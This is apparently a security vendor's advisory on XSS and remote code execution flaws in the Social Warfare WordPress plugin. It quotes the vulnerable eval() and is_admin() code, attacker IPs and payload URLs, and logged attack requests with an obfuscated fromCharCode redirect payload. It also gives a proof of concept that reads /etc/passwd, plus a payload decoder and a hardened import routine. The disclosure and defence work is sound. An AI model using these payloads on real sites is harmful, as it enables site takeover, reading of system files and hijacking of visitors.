
Social Warfare XSS and RCE Vulnerabilities and Attack Data

March 25, 2019 by Oliver Sild

Last week, an unnamed security researcher publicly disclosed security vulnerabilities in the popular WordPress plugin “Social Warfare”, which according to the WordPress Plugins repository currently has over 70,000 active installations. This caught the attention of hackers and caused massive attacks on websites using that plugin.

At the time of writing this article, we are seeing an ongoing hacking campaign in which we have blocked more than 80,000 hacking attempts.


Cross-site Scripting in Social Warfare Plugin

The flaw that is already being used for widespread ad injection abuses the function that retrieves code from the “swp_url” parameter and saves it as the Social Warfare plugin settings. This lets an attacker inject code that runs in visitors' web browsers whenever the Social Warfare buttons are loaded.

//* Preserve filtered data, such as license keys.
$new_options = array_merge( get_option('social_warfare_settings'), $fetched_options );

if (update_option( 'social_warfare_settings', $new_options )) {
     wp_die('Social Warfare settings updated to match ' . $_GET['swp_url']);
}

Attack Sources

There are active hacking campaigns against websites that use the “Social Warfare” plugin at the moment. The top 5 attack sources detected by WebARX (from over 80,000 blocked attempts) originate from the following IP addresses:

  • 46.32.249.72
  • 34.194.221.173
  • 74.208.85.144
  • 93.90.206.23
  • 162.243.1.231

Attack Payloads

At the beginning of the hacking campaign, attackers mainly used PasteBin to anonymously host their malicious code. A few days later, we noticed an IP address that belongs to the hosting provider “McHost.Ru”.

  • https://pastebin.com/raw/HRsL6Drh (49.05%)
  • http://109.234.34.22/mv.txt (47.03%)
  • https://pastebin.com/raw/Th1EKR8i (0.1%)
  • others (3.82%)

The malicious code in the attack payloads is delivered as a list of Unicode character codes, which is later converted to a string and executed as JavaScript. In most cases, it simply redirects users to an ads site.

Image: Social Warfare attack payload.

“is_admin()” function

It is evident that the developers intended to verify whether the user is allowed to save the settings, but unfortunately they used the wrong function.

if (!is_admin()) {
    wp_die('You do not have authorization to view this page.');
}

Developers very often believe that the is_admin() function checks whether the current user has administrator privileges. However, it only checks whether the requested page is part of the admin interface. In this case, wp-admin/admin-post.php is such a page, so anyone was allowed to import plugin settings.

Other plugins also targeted

The same IP address is targeting other plugins that are known to have security issues in permission handling. We noticed attacks against the WP GDPR plugin, Smart Google Code Inserter and a couple of others.

Screenshot from WebARX firewall logs.
// Attacks on WP GDPR plugin
Array
(
    [action] => wpgdprc_process_action
    [data] => {"type":"save_setting","append":false,"option":"siteurl","value" :"https://redrentalservice.com/java.js?t=2&"}
    [security] => 
)

// Attacks on Smart Google Code Inserter plugin
Array
(
    [action] => savegooglecode
    [sgcgoogleanalytic] => <script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 97, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 114, 101, 100, 114, 101, 110, 116, 97, 108, 115, 101, 114, 118, 105, 99, 101, 46, 99, 111, 109, 47, 63, 116, 52, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 97, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 97, 59, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 97, 59));</script>
    [sgcwebtools] => 
)
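The fromCharCode obfuscation shown in the log line above (and described in the "Attack Payloads" section) is easy to undo for analysis. The following is an added example, not WebARX's or the plugin's code: it decodes every String.fromCharCode(...) call found in a request parameter and flags decoded JavaScript that redirects the visitor. The sample parameter is constructed for this example, with a placeholder domain in place of the real one.

```php
<?php
// Added example: decode String.fromCharCode(...) payloads from firewall
// logs so a reviewer can read what an injected setting would execute.

/**
 * Return every String.fromCharCode(...) call in $input decoded to text.
 * Non-numeric arguments are skipped rather than guessed at.
 */
function decode_fromcharcode_calls( $input ) {
    $decoded = array();
    if ( ! preg_match_all( '/String\.fromCharCode\(\s*([\d\s,]+)\)/i', $input, $matches ) ) {
        return $decoded;
    }
    foreach ( $matches[1] as $arg_list ) {
        // Split the argument list, drop empty entries left by trailing commas.
        $codes = array_filter( array_map( 'trim', explode( ',', $arg_list ) ), 'strlen' );
        $text  = '';
        foreach ( $codes as $code ) {
            if ( ! ctype_digit( $code ) ) {
                continue;
            }
            $text .= mb_chr( (int) $code, 'UTF-8' ); // handles code points above 0xFF too
        }
        $decoded[] = $text;
    }
    return $decoded;
}

/** Heuristic: does the decoded JavaScript navigate the visitor elsewhere? */
function looks_like_redirect( $js ) {
    return (bool) preg_match( '/(?:window|document)\.location(?:\.href|\.replace)?\s*[=(]/i', $js );
}

// Constructed sample modelled on the logged payload; "ads.example" is a placeholder.
$sample_param = '<script language=javascript>eval(String.fromCharCode('
    . '118,97,114,32,97,32,61,32,34,104,116,116,112,115,58,47,47,97,100,115,46,101,120,97,109,112,108,101,47,34,59,'
    . '119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,97,59'
    . '));</script>';

foreach ( decode_fromcharcode_calls( $sample_param ) as $js ) {
    printf( "decoded: %s\nredirect: %s\n", $js, looks_like_redirect( $js ) ? 'yes' : 'no' );
}
```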

Remote Code Execution in Social Warfare Plugin

While most attention focused on the XSS attacks and injected ads, we also detected another critical vulnerability. It allows an attacker to take over the entire WordPress site and manage all files and databases on the hosting account.

The vulnerability is located in the eval() call that runs PHP code fetched from the URL the attacker supplies in the “swp_url” GET parameter.

$options = file_get_contents($_GET['swp_url'] . '?swp_debug=get_user_options');

// ...

$array = 'return ' . $options . ';';

try {

     $fetched_options = eval( $array );

}
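Both defects described above (the is_admin() check in the previous section and the eval() of remote content here) sit in the same import flow. The following is an added example, not the plugin's own code, of how that flow can be written with a capability check, a nonce, URL validation and data parsing instead of code execution. The nonce action name and the allow-list of option keys are assumptions for this example; all other functions are WordPress core.

```php
<?php
// Added example: a hardened version of the remote settings import. Runs inside
// WordPress; 'swp_import_settings' and the $allowed keys are assumed values.

function swp_safe_import_settings() {
    // 1. Authorize the user, not the page: is_admin() is true for every request
    //    to wp-admin/admin-post.php, while current_user_can() checks capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You do not have authorization to view this page.', '', array( 'response' => 403 ) );
    }
    // 2. A nonce ties the request to a form the administrator actually submitted.
    check_admin_referer( 'swp_import_settings' );

    // 3. Fetch only from a well-formed http(s) URL; wp_http_validate_url() also
    //    rejects local/private hosts by default, limiting server-side requests.
    $url = isset( $_GET['swp_url'] ) ? wp_http_validate_url( wp_unslash( $_GET['swp_url'] ) ) : false;
    if ( ! $url ) {
        wp_die( 'Invalid import URL.', '', array( 'response' => 400 ) );
    }
    $response = wp_remote_get( add_query_arg( 'swp_debug', 'get_user_options', $url ), array( 'timeout' => 10 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        wp_die( 'Could not fetch settings.', '', array( 'response' => 502 ) );
    }

    // 4. Parse the body as data, never as code: json_decode() cannot execute anything.
    $fetched = json_decode( wp_remote_retrieve_body( $response ), true );
    if ( ! is_array( $fetched ) ) {
        wp_die( 'Remote settings are not a JSON object.', '', array( 'response' => 400 ) );
    }

    // 5. Keep only known keys with expected types; unknown keys are dropped so
    //    the remote file cannot smuggle in settings the plugin never defined.
    $allowed = array( 'network_tw' => 'bool', 'network_fb' => 'bool', 'twitter_id' => 'text' ); // assumed keys
    $clean   = array();
    foreach ( $allowed as $key => $type ) {
        if ( ! array_key_exists( $key, $fetched ) ) {
            continue;
        }
        $clean[ $key ] = ( 'bool' === $type ) ? (bool) $fetched[ $key ] : sanitize_text_field( (string) $fetched[ $key ] );
    }

    $new_options = array_merge( get_option( 'social_warfare_settings', array() ), $clean );
    update_option( 'social_warfare_settings', $new_options );
    // Escape the URL before echoing it; the original echoed $_GET['swp_url'] raw.
    wp_die( 'Social Warfare settings updated from ' . esc_html( $url ) );
}
```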

Proof of Concept

Instead of pointing “swp_url” at an array of plugin settings, the attacker can pass a URL whose content executes a system command and returns its output.

<!-- Content of http://192.168.8.103:31337/test.txt -->
<pre>system('cat /etc/passwd')</pre>

Conclusion

We strongly encourage you to update the Social Warfare plugin to the latest version (3.5.3). It patches both vulnerabilities mentioned in this article.

Firewall rules for both of these vulnerabilities have been shipped to WebARX users since the 22nd of March.
